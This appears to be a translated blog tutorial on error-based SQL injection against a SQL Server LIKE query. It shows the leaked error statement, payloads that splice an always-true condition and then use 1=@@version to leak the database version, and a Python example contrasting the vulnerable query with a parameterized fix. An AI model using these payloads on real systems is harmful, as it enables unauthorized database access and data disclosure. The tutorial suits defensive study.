Using an always-true condition to carry out SQL injection

Q: You run into a SQL injection point that throws errors. What do you do?

1. First, copy out part of the failing statement:

SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at ...... (followed by a very long SQL statement)

2. How do you approach such a complex statement? Simplify it so it is easier to analyse:

SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') ...... (a lot more follows; we ignore it)

Now let's look at how the injection works.

Using an always-true condition to carry out SQL injection:
(Without an always-true condition, injecting ' and 1=@@version+-- into such a complex statement breaks the logic of the whole SQL statement, the query fails, and the version is never obtained.)

1. What if the statement is very complex? Reduce it to the statement below so we don't get lost:
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')

2. Inject %' and 1=1 and '%'=' so that the concatenated statement stays syntactically valid and does not error:
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')

3. Now change 1=1 to 1=@@version: the "true" condition becomes "false", the comparison of an integer with the version string makes the database raise an error, and the error message leaks the database version:
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')
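As an added example (not code from the original post), the concatenated LIKE query the post dissects beside its parameterized replacement, so the effect of the stray quote and of the always-true splice can be seen on the same input. Python's sqlite3 stands in for SQL Server, and the table and rows are constructed (both are assumptions); the point about binding the whole pattern as a parameter applies unchanged to SqlClient.

```python
import sqlite3

# Constructed sample rows standing in for TB_XZSQ_Apply; sqlite3 replaces SQL Server here (assumption)
ROWS = [("Bonus request", 2), ("Travel B-class", 4), ("Other", 2)]


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE apply (FFormSubTitle TEXT, FProcStatus INTEGER)")
    conn.executemany("INSERT INTO apply VALUES (?, ?)", ROWS)
    return conn


def search_concat(conn, subtitle):
    """Vulnerable: mirrors the post's query, with the user's text spliced into the LIKE literal."""
    sql = f"SELECT FFormSubTitle FROM apply WHERE 1=1 AND FFormSubTitle LIKE '%{subtitle}%'"
    return sorted(r[0] for r in conn.execute(sql))


def escape_like(text):
    """Escape LIKE metacharacters so % and _ typed by the user match literally."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_param(conn, subtitle):
    """Hardened: the whole pattern is bound as a parameter; quotes and keywords are data, not SQL."""
    sql = "SELECT FFormSubTitle FROM apply WHERE FFormSubTitle LIKE ? ESCAPE '\\'"
    return sorted(r[0] for r in conn.execute(sql, (f"%{escape_like(subtitle)}%",)))


def compare(subtitle):
    """Run both variants on one input; 'error' stands for the exception seen in the post's stack trace."""
    conn = setup()
    try:
        concat = search_concat(conn, subtitle)
    except sqlite3.OperationalError:
        concat = "error"
    return concat, search_param(conn, subtitle)


if __name__ == "__main__":
    # A normal search, the stray quote that produced the error page, and the post's always-true splice
    for inp in ["B", "B'", "%' and 1=1 and '%'='"]:
        print(repr(inp), "->", compare(inp))
```

The concatenated variant errors on the bare quote and returns every row for the always-true splice, while the parameterized variant returns only titles that literally contain the typed text.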

Original URL: https://www.cnblogs.com/relax1949/p/14069837.html